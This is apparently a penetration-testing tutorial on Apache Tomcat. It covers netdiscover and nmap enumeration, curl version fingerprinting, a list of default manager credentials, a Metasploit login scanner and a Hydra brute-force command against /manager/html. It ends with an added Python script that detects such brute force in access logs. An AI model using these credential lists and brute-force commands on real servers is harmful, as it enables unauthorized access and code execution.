Enumeration
After completing the setup, begin the enumeration phase.
On Kali Linux, use netdiscover to identify machines in the network:
sudo netdiscover
After identifying the victim machine's IP address, perform further enumeration using Nmap:
nmap -sV <tomcat_target_ip> -p 8080
Tomcat usually runs on port 8080.
Common Tomcat error:

Version Identification
To find the version of Apache Tomcat, a simple command can be executed:
curl -s http://<tomcat_target_ip>:8080/docs/ | grep Tomcat
This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
Default Credentials
The /manager/html directory is highly sensitive, as it allows WAR file uploads for potential code execution. Common credentials to test include:
admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
You can test these using:
msf> use auxiliary/scanner/http/tomcat_mgr_login
Another directory to monitor is /manager/status, which reveals the Tomcat and OS version, aiding in vulnerability assessment.
Brute Force Attacks
To brute force the /manager/html directory, use tools like Hydra:
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f <tomcat_target_ip> http-get /manager/html
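On the defending side, both the default-credential checks and the brute force described above show up in Tomcat's access log as runs of 401 responses on /manager/ paths. The following is an added example, not part of the original page: it assumes the "common" AccessLogValve pattern (%h %l %u %t "%r" %s %b), and the threshold, function name and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
THRESHOLD = 5  # assumed cut-off: failed manager logins per source before alerting


def manager_auth_findings(lines, threshold=THRESHOLD):
    """Return {source: {"failures": n, "success_after_failures": user or None}}
    for sources with at least `threshold` 401 responses on /manager/ paths."""
    failures = defaultdict(int)
    success = {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m or not m["path"].startswith("/manager/"):
            continue  # unparsable line or a path outside the manager app
        host, status = m["host"], m["status"]
        if status == "401":
            failures[host] += 1
        elif status == "200" and m["user"] != "-" and failures[host] >= threshold:
            # Authenticated 200 after a run of failures: a guess may have worked.
            success.setdefault(host, m["user"])
    return {
        host: {"failures": n, "success_after_failures": success.get(host)}
        for host, n in failures.items()
        if n >= threshold
    }


# Constructed sample log lines (documentation address ranges), not real traffic.
_FMT = '%s - %s [12/Mar/2024:10:01:%02d +0000] "GET %s HTTP/1.1" %s 2473'
SAMPLE = (
    [_FMT % ("198.51.100.7", "-", s, "/manager/html", "401") for s in range(6)]
    + [_FMT % ("198.51.100.7", "tomcat", 6, "/manager/html", "200")]
    + [_FMT % ("203.0.113.20", "-", 7, "/manager/html", "401")]   # one mistyped password
    + [_FMT % ("203.0.113.20", "admin", 8, "/manager/html", "200")]
    + [_FMT % ("192.0.2.44", "-", 9, "/docs/", "200")]            # not a manager path
)

if __name__ == "__main__":
    for src, info in manager_auth_findings(SAMPLE).items():
        print(src, info)
```

A non-empty success_after_failures value is the case to escalate first, since the manager application accepts WAR uploads once a login succeeds.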